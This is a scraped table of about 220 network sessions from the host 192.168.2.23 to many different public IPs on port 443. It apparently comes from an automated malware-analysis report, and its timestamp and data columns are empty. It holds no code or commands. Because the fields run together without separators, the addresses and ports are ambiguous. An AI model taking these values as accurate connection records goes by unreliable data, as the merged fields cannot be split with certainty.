                                          9768192.168.2.2358630158.35.2.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9769192.168.2.2355234137.132.44.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9770192.168.2.235364459.93.19.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9771192.168.2.234480812.79.14.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9772192.168.2.235133661.144.172.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9773192.168.2.2350978163.103.41.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9774192.168.2.2349544196.156.91.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9775192.168.2.23550122.207.233.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9776192.168.2.2333736113.118.161.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9777192.168.2.234000888.175.53.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9778192.168.2.2342320136.8.127.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9779192.168.2.233558263.186.221.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9780192.168.2.2337972179.93.7.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9781192.168.2.2344986101.4.253.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9782192.168.2.2351122172.141.145.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9783192.168.2.2338148176.191.134.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9784192.168.2.234816681.94.195.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9785192.168.2.2340392154.52.75.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9786192.168.2.233661292.201.56.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9787192.168.2.234243266.100.211.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9788192.168.2.2351222157.244.146.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9789192.168.2.234745223.131.250.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9790192.168.2.234008249.183.221.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9791192.168.2.233444438.108.137.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9792192.168.2.233595295.222.155.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9793192.168.2.23433445.98.247.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9794192.168.2.2346674185.255.191.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9795192.168.2.233786234.107.226.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9796192.168.2.2343158100.57.23.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9797192.168.2.233502874.235.88.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9798192.168.2.2341506207.161.116.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9799192.168.2.235511414.52.144.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9800192.168.2.2340172205.7.182.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9801192.168.2.2354456167.51.177.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9802192.168.2.2336618168.152.67.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9803192.168.2.235453280.52.240.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9804192.168.2.23474621.82.133.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9805192.168.2.2353476139.84.193.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9806192.168.2.2357932113.10.152.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9807192.168.2.2354220205.94.150.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9808192.168.2.235184289.234.82.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9809192.168.2.2333236155.67.146.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9810192.168.2.234814264.239.44.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9811192.168.2.2358374101.157.43.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9812192.168.2.2336708187.101.209.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9813192.168.2.2336660128.233.51.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9814192.168.2.234602093.222.51.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9815192.168.2.234022232.159.231.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9816192.168.2.2356310203.218.86.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9817192.168.2.2337660109.172.162.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9818192.168.2.235647483.93.148.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9819192.168.2.233340468.107.115.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9820192.168.2.235025286.225.55.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9821192.168.2.235300653.154.204.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9822192.168.2.2349398193.31.110.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9823192.168.2.235088082.13.20.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9824192.168.2.234976620.2.14.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9825192.168.2.2353956143.151.234.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9826192.168.2.2342858154.221.212.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9827192.168.2.2343848196.142.223.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9828192.168.2.2335014154.200.85.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9829192.168.2.2339152192.184.172.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9830192.168.2.2344714147.38.158.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9831192.168.2.234773698.146.217.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9832192.168.2.2357174134.238.41.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9833192.168.2.235242293.216.52.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9834192.168.2.235560047.37.49.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9835192.168.2.2340258126.131.61.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9836192.168.2.2332946103.232.213.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9837192.168.2.2347994142.58.68.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9838192.168.2.235929289.249.218.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9839192.168.2.234273041.110.101.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9840192.168.2.2353488186.63.177.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9841192.168.2.234181848.76.89.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9842192.168.2.234760666.176.36.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9843192.168.2.233330691.11.185.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9844192.168.2.23406684.130.94.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9845192.168.2.235734419.146.204.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9846192.168.2.2336710102.234.194.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9847192.168.2.234991895.244.26.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9848192.168.2.2333002160.137.56.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9849192.168.2.2336144216.103.172.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9850192.168.2.2339228178.124.223.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9851192.168.2.233586292.78.154.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9852192.168.2.2351048183.126.9.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9853192.168.2.2349178138.61.118.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9854192.168.2.2359914194.7.125.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9855192.168.2.2342492103.174.109.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9856192.168.2.234470223.65.156.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9857192.168.2.2342652204.191.197.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9858192.168.2.2334926153.104.151.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9859192.168.2.234503894.233.177.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9860192.168.2.233674258.73.212.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9861192.168.2.2360770130.8.1.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9862192.168.2.2341396187.6.213.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9863192.168.2.2342156137.112.137.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9864192.168.2.2344544153.243.54.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9865192.168.2.234804263.65.49.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9866192.168.2.2341782118.39.233.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9867192.168.2.235200078.9.13.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9868192.168.2.2351306133.116.69.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9869192.168.2.2345984118.46.43.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9870192.168.2.2344730218.57.75.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9871192.168.2.235358095.217.87.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9872192.168.2.2343246210.22.172.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9873192.168.2.2337926201.51.180.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9874192.168.2.2353628179.172.144.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9875192.168.2.236052076.223.124.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9876192.168.2.2350562163.181.113.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9877192.168.2.233651652.157.99.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9878192.168.2.236055458.148.47.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9879192.168.2.2347144163.140.228.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9880192.168.2.2337686220.133.122.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9881192.168.2.2338632198.105.249.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9882192.168.2.2358290174.36.188.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9883192.168.2.2333074209.67.88.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9884192.168.2.234413037.52.57.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9885192.168.2.2346138172.101.225.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9886192.168.2.235512834.78.169.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9887192.168.2.2355224207.122.192.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9888192.168.2.23371684.147.250.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9889192.168.2.2347362115.180.173.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9890192.168.2.2333758161.15.18.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9891192.168.2.2349466201.61.135.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9892192.168.2.2359674132.239.127.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9893192.168.2.235996878.29.114.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9894192.168.2.2359950148.24.6.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9895192.168.2.236030491.215.65.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9896192.168.2.235927453.203.235.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9897192.168.2.233791260.49.92.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9898192.168.2.2344982198.30.248.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9899192.168.2.2338404191.66.160.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9900192.168.2.233916440.37.34.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9901192.168.2.2340058159.113.87.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9902192.168.2.2355974171.243.0.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9903192.168.2.2355222171.62.208.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9904192.168.2.233802058.119.23.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9905192.168.2.2353010122.23.156.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9906192.168.2.2355848137.247.126.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9907192.168.2.2335200138.184.131.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9908192.168.2.2339514174.12.220.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9909192.168.2.234511248.173.93.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9910192.168.2.2353586134.126.233.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9911192.168.2.2336050112.129.118.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9912192.168.2.235823092.187.175.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9913192.168.2.2348418113.59.103.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9914192.168.2.2337524216.85.226.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9915192.168.2.2346422184.81.180.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9916192.168.2.2356624128.107.250.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9917192.168.2.235469234.58.28.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9918192.168.2.2347294198.68.99.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9919192.168.2.233963019.150.137.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9920192.168.2.2340166116.108.206.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9921192.168.2.236098824.106.175.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9922192.168.2.2360254126.122.166.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9923192.168.2.235513476.137.49.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9924192.168.2.2349380190.125.199.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9925192.168.2.235767291.123.143.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9926192.168.2.2337352163.248.158.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9927192.168.2.2347556116.54.106.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9928192.168.2.2344994103.142.76.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9929192.168.2.2337224211.171.239.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9930192.168.2.2350798104.234.160.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9931192.168.2.2354748199.204.228.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9932192.168.2.234405269.214.233.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9933192.168.2.234639478.217.62.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9934192.168.2.2333878172.64.175.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9935192.168.2.2353430145.146.179.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9936192.168.2.233953241.164.210.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9937192.168.2.2337194198.139.101.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9938192.168.2.2345138134.190.134.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9939192.168.2.2353812203.138.222.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9940192.168.2.2343138131.56.17.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9941192.168.2.234601479.10.137.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9942192.168.2.2333518206.203.175.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9943192.168.2.2345756220.27.11.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9944192.168.2.2352258128.124.97.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9945192.168.2.235406248.185.224.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9946192.168.2.2344306201.144.64.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9947192.168.2.2353664186.205.117.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9948192.168.2.234640096.165.126.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9949192.168.2.2357736202.69.89.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9950192.168.2.235996848.17.240.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9951192.168.2.2344690104.98.141.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9952192.168.2.2345582166.69.136.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9953192.168.2.2340860155.209.160.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9954192.168.2.235731835.122.168.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9955192.168.2.2333458157.244.216.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9956192.168.2.235483663.103.235.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9957192.168.2.234540284.152.3.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9958192.168.2.2334876102.242.210.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9959192.168.2.236015820.233.82.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9960192.168.2.235887249.189.203.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9961192.168.2.2350570112.199.232.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9962192.168.2.2338202157.34.33.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9963192.168.2.2337386144.59.205.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9964192.168.2.233338042.125.169.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9965192.168.2.2343600208.214.208.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9966192.168.2.2343210151.95.189.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9967192.168.2.235890464.25.92.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9968192.168.2.2350296170.221.46.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9969192.168.2.2333308119.6.91.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9970192.168.2.2349364112.200.44.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9971192.168.2.2334732119.7.157.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9972192.168.2.235389050.60.24.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9973192.168.2.2336426103.62.247.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9974192.168.2.2352018152.95.145.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9975192.168.2.2340010221.57.135.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9976192.168.2.2344352133.213.163.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9977192.168.2.2342536111.255.121.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9978192.168.2.233710847.23.237.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9979192.168.2.234981473.237.190.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9980192.168.2.2336876180.1.93.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9981192.168.2.2338740104.1.183.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9982192.168.2.234091268.222.154.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9983192.168.2.233936682.160.73.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9984192.168.2.2357944184.10.28.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9985192.168.2.2344350153.201.193.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9986192.168.2.233478860.57.150.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9987192.168.2.2336010159.129.151.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9988192.168.2.2339484116.226.112.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9989192.168.2.2338178124.79.159.155443
                                          TimestampBytes transferredDirectionData


